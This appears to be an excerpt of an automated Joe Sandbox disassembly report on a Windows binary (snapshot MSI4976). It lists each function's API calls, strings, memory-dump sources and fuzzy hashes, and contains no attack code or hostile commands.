                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 0035C8BB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend$CtrlParent$_memmove
                                        • String ID: @U=u$ComboBox$ListBox
                                        • API String ID: 313823418-2258501812
                                        • Opcode ID: 81afee622451a63ce7e8ab3f8b44c1f51c426886e5b11c9bec6111f13cd4cbdf
                                        • Instruction ID: 3f3c55055525af4a425c76c99b845000dd0db3b6b62fd50fc71927f5cbdd56b3
                                        • Opcode Fuzzy Hash: 81afee622451a63ce7e8ab3f8b44c1f51c426886e5b11c9bec6111f13cd4cbdf
                                        • Instruction Fuzzy Hash: 1E21B375A00208BFDF06AB64CC85EFEB7B9EF45301F540015F912E71A1DB7859199B20
                                        Function 0035C8CD Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 71windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetParent.USER32 ref: 0035C8D9
                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 0035C8EE
                                        • _wcscmp.LIBCMT ref: 0035C900
                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0035C97B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameParentSend_wcscmp
                                        • String ID: @U=u$SHELLDLL_DefView$details$largeicons$list$smallicons
                                        • API String ID: 1704125052-1428604138
                                        • Opcode ID: 8157373dafc8ec7c02f0996c7682c6fef2fd472a174a8b3d64286f1e43386700
                                        • Instruction ID: 59fc26168f15b9db58d7edc9517cdb3957d9a0f129b3246d40c50529ec73b8c0
                                        • Opcode Fuzzy Hash: 8157373dafc8ec7c02f0996c7682c6fef2fd472a174a8b3d64286f1e43386700
                                        • Instruction Fuzzy Hash: FF11E377258702BDFA072A30AC0ACE777DCDB17329B200017FD00A90E2FBA169454590
                                        Function 003657FB Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 00365816
                                        • GetMenuItemInfoW.USER32(003E18F0,000000FF,00000000,00000030), ref: 00365877
                                        • SetMenuItemInfoW.USER32(003E18F0,00000004,00000000,00000030), ref: 003658AD
                                        • Sleep.KERNEL32(000001F4), ref: 003658BF
                                        • GetMenuItemCount.USER32(?), ref: 00365903
                                        • GetMenuItemID.USER32(?,00000000), ref: 0036591F
                                        • GetMenuItemID.USER32(?,-00000001), ref: 00365949
                                        • GetMenuItemID.USER32(?,?), ref: 0036598E
                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003659D4
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003659E8
                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00365A09
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                        • String ID:
                                        • API String ID: 4176008265-0
                                        • Opcode ID: b7274957070ab0c9935382d5587000702a4c742534a7a25b0fa0c048e69ed090
                                        • Instruction ID: 13cd449d658e898898e2b6bf794623ee11de4421057fb40ee59372649db27bf8
                                        • Opcode Fuzzy Hash: b7274957070ab0c9935382d5587000702a4c742534a7a25b0fa0c048e69ed090
                                        • Instruction Fuzzy Hash: 81619F71900689EFDF23CFA4C888AAE7BFDEB06358F158169F442A7255D731AD45CB20
                                        Function 00389A23 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00389AA5
                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00389AA8
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00389ACC
                                        • _memset.LIBCMT ref: 00389ADD
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00389AEF
                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00389B67
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend$LongWindow_memset
                                        • String ID:
                                        • API String ID: 830647256-0
                                        • Opcode ID: 2869db3673bdfe24715d750f875ad62a262cb79219dcd6c9b3fa16062413cae5
                                        • Instruction ID: 5e65c83dff5addb71e9652605801b1b9e3e9e36899783860dacca6dba4e52f04
                                        • Opcode Fuzzy Hash: 2869db3673bdfe24715d750f875ad62a262cb79219dcd6c9b3fa16062413cae5
                                        • Instruction Fuzzy Hash: C8615C75A00258AFDB22DFA4CC81FEE77F8EF09700F14019AFA15AB2A1D774A945DB50
                                        Function 00363569 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetKeyboardState.USER32(?), ref: 00363591
                                        • GetAsyncKeyState.USER32(000000A0), ref: 00363612
                                        • GetKeyState.USER32(000000A0), ref: 0036362D
                                        • GetAsyncKeyState.USER32(000000A1), ref: 00363647
                                        • GetKeyState.USER32(000000A1), ref: 0036365C
                                        • GetAsyncKeyState.USER32(00000011), ref: 00363674
                                        • GetKeyState.USER32(00000011), ref: 00363686
                                        • GetAsyncKeyState.USER32(00000012), ref: 0036369E
                                        • GetKeyState.USER32(00000012), ref: 003636B0
                                        • GetAsyncKeyState.USER32(0000005B), ref: 003636C8
                                        • GetKeyState.USER32(0000005B), ref: 003636DA
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: State$Async$Keyboard
                                        • String ID:
                                        • API String ID: 541375521-0
                                        • Opcode ID: 863981ee86a5dc6952adf5abe71339867e8610057e2e34fbd340e44ac75fca04
                                        • Instruction ID: e22485a8d15f3dfd013df7ff924dec2d4d1e669d63a3d736d4a05023e4285b33
                                        • Opcode Fuzzy Hash: 863981ee86a5dc6952adf5abe71339867e8610057e2e34fbd340e44ac75fca04
                                        • Instruction Fuzzy Hash: 2241E1609047C97DFF339B64C8543A5BAA1AB13344F09C04DD6C3476C6EBA49BC88BA2
                                        Function 0035A28D Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 0035A2AA
                                        • SafeArrayAllocData.OLEAUT32(?), ref: 0035A2F5
                                        • VariantInit.OLEAUT32(?), ref: 0035A307
                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 0035A327
                                        • VariantCopy.OLEAUT32(?,?), ref: 0035A36A
                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 0035A37E
                                        • VariantClear.OLEAUT32(?), ref: 0035A393
                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 0035A3A0
                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0035A3A9
                                        • VariantClear.OLEAUT32(?), ref: 0035A3BB
                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0035A3C6
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                        • String ID:
                                        • API String ID: 2706829360-0
                                        • Opcode ID: 900aa3de839148e82dd9aa3e073c7e5191b9189f3ee558064dc94362455db9b4
                                        • Instruction ID: c165bab3c85cf1aec581fd292d68ae308e1c90c806822afb19bd58a269a0c56b
                                        • Opcode Fuzzy Hash: 900aa3de839148e82dd9aa3e073c7e5191b9189f3ee558064dc94362455db9b4
                                        • Instruction Fuzzy Hash: AE415E75900219AFDB02DFA5DC84DDEBFB9FF09305F008065F912A7261DB34AA49DBA1
                                        Function 0037B250 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 003284A6: __swprintf.LIBCMT ref: 003284E5
                                          • Part of subcall function 003284A6: __itow.LIBCMT ref: 00328519
                                        • CoInitialize.OLE32 ref: 0037B298
                                        • CoUninitialize.COMBASE ref: 0037B2A3
                                        • CoCreateInstance.COMBASE(?,00000000,00000017,003AD8FC,?), ref: 0037B303
                                        • IIDFromString.COMBASE(?,?), ref: 0037B376
                                        • VariantInit.OLEAUT32(?), ref: 0037B410
                                        • VariantClear.OLEAUT32(?), ref: 0037B471
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                        • API String ID: 834269672-1287834457
                                        • Opcode ID: dcafabffd2618da4ac023949e5b217903080fe0abffb783b38fc1a6ed6e9a235
                                        • Instruction ID: 35ad421dcc7de52439c4a57a40ab465cc181242a2eeb76058e69795408628f7a
                                        • Opcode Fuzzy Hash: dcafabffd2618da4ac023949e5b217903080fe0abffb783b38fc1a6ed6e9a235
                                        • Instruction Fuzzy Hash: CC61AD312047019FD722DF54C885B6EF7F8AF49714F008819F9899B291C774ED84CB92
                                        Function 0033C24A Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 185windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetWindowLongW.USER32(?,000000EB), ref: 0033C2D2
                                          • Part of subcall function 0033C697: GetClientRect.USER32(?,?), ref: 0033C6C0
                                          • Part of subcall function 0033C697: GetWindowRect.USER32(?,?), ref: 0033C701
                                          • Part of subcall function 0033C697: ScreenToClient.USER32(?,000000FF), ref: 0033C729
                                        • GetDC.USER32 ref: 0039E006
                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0039E019
                                        • SelectObject.GDI32(00000000,00000000), ref: 0039E027
                                        • SelectObject.GDI32(00000000,00000000), ref: 0039E03C
                                        • ReleaseDC.USER32(?,00000000), ref: 0039E044
                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0039E0CF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                        • String ID: @U=u$U
                                        • API String ID: 4009187628-4110099822
                                        • Opcode ID: e3e506116ee503f3d01bda3384fd5fd6e89c6f8df479c1d762966bf9f62574d9
                                        • Instruction ID: 58c85bab98bd2c90cc0d12bef2227b17cd63ccbaf1f7e9e3791da3ceba467cca
                                        • Opcode Fuzzy Hash: e3e506116ee503f3d01bda3384fd5fd6e89c6f8df479c1d762966bf9f62574d9
                                        • Instruction Fuzzy Hash: 5F71D131500209DFCF23CF64CC85AEA7BB9FF49350F198669ED56AA2A6C7318C41DB61
                                        Function 00378694 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WSAStartup.WS2_32(00000101,?), ref: 003786F5
                                        • inet_addr.WS2_32(?), ref: 0037873A
                                        • gethostbyname.WS2_32(?), ref: 00378746
                                        • IcmpCreateFile.IPHLPAPI ref: 00378754
                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 003787C4
                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 003787DA
                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 0037884F
                                        • WSACleanup.WS2_32 ref: 00378855
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                        • String ID: Ping
                                        • API String ID: 1028309954-2246546115
                                        • Opcode ID: c351cee7d092c052e4725e379965836e879c09b37d639600248d4970b9f106a5
                                        • Instruction ID: dae472d24318b5849664bc55b8f73eeabddba6301253cb0b3d1f01ab9000248a
                                        • Opcode Fuzzy Hash: c351cee7d092c052e4725e379965836e879c09b37d639600248d4970b9f106a5
                                        • Instruction Fuzzy Hash: C451A631644200AFD722DF24DD89B2AB7E8EF49710F158529F55ADB2A1DF34ED00CB42
                                        Function 00389C50 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 00389C68
                                        • CreateMenu.USER32 ref: 00389C83
                                        • SetMenu.USER32(?,00000000), ref: 00389C92
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00389D1F
                                        • IsMenu.USER32(?), ref: 00389D35
                                        • CreatePopupMenu.USER32 ref: 00389D3F
                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00389D70
                                        • DrawMenuBar.USER32 ref: 00389D7E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                        • String ID: 0
                                        • API String ID: 176399719-4108050209
                                        • Opcode ID: 3c93e23d65877d14f0bb9b4cf6df2098c7a38a72a285067c7a816b53d72fbe78
                                        • Instruction ID: 00ecba337435db9322b0c0dab2e2d34d61fe32b830088e47ce5f2644ffa05312
                                        • Opcode Fuzzy Hash: 3c93e23d65877d14f0bb9b4cf6df2098c7a38a72a285067c7a816b53d72fbe78
                                        • Instruction Fuzzy Hash: CB414875A00209AFDB22EF64D884BEA7BB9FF49304F190459E946AB361D730A914CF64
                                        Function 0036EC11 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 0036EC1E
                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0036EC94
                                        • GetLastError.KERNEL32 ref: 0036EC9E
                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 0036ED0B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Error$Mode$DiskFreeLastSpace
                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                        • API String ID: 4194297153-14809454
                                        • Opcode ID: 3a02331cc219e0740457b4c9574c977814a5987c978d11975882645475ac7773
                                        • Instruction ID: f4fbdc25d47c4bdfa348fd48844b43294189c103897b5199e0c5eeecd7893b26
                                        • Opcode Fuzzy Hash: 3a02331cc219e0740457b4c9574c977814a5987c978d11975882645475ac7773
                                        • Instruction Fuzzy Hash: 1E31A13AA002099FC713EF68D945EEEB7B8FF45700F118026F502EB295DA719E45CB91
                                        Function 00388CDB Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 95windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DeleteObject.GDI32(00000000), ref: 00388CF3
                                        • GetDC.USER32(00000000), ref: 00388CFB
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00388D06
                                        • ReleaseDC.USER32(00000000,00000000), ref: 00388D12
                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00388D4E
                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00388D5F
                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00388D99
                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00388DB9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                        • String ID: @U=u
                                        • API String ID: 3864802216-2594219639
                                        • Opcode ID: 4783d530e4560f2ee655f6616cb670aa84f891e8bca0cd9b523eff9f8da81e80
                                        • Instruction ID: d2ee11317a06f995906d2183b91650153b1aa006d9a6700a326a304f202de307
                                        • Opcode Fuzzy Hash: 4783d530e4560f2ee655f6616cb670aa84f891e8bca0cd9b523eff9f8da81e80
                                        • Instruction Fuzzy Hash: 1D318B72200210BBEB129F54CC8AFEA3BADEF4A711F054055FE099A191CAB59841CB70
                                        Function 0036B05A Relevance: 15.3, APIs: 10, Instructions: 317COMMON
                                        Download Yara Rule
                                        APIs
                                        • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0036B137
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ArraySafeVartype
                                        • String ID:
                                        • API String ID: 1725837607-0
                                        • Opcode ID: 9f0450e1f257204fe6fb90935152f76c41de3a11b19e576ab341a5ffcd2ae56c
                                        • Instruction ID: 2e68b893e102d5cbb6e899c86462500f0c7690eddf21e82fa090e236382888b6
                                        • Opcode Fuzzy Hash: 9f0450e1f257204fe6fb90935152f76c41de3a11b19e576ab341a5ffcd2ae56c
                                        • Instruction Fuzzy Hash: 4EC17D75A0021ADFDB06CF98C491BAEB7F4EF09315F20806AE616EB351D734A981CF90
                                        Function 0034BA66 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                        Download Yara Rule
                                        APIs
                                        • __lock.LIBCMT ref: 0034BA74
                                          • Part of subcall function 00348984: __mtinitlocknum.LIBCMT ref: 00348996
                                          • Part of subcall function 00348984: RtlEnterCriticalSection.NTDLL(00340127), ref: 003489AF
                                        • __calloc_crt.LIBCMT ref: 0034BA85
                                          • Part of subcall function 00347616: __calloc_impl.LIBCMT ref: 00347625
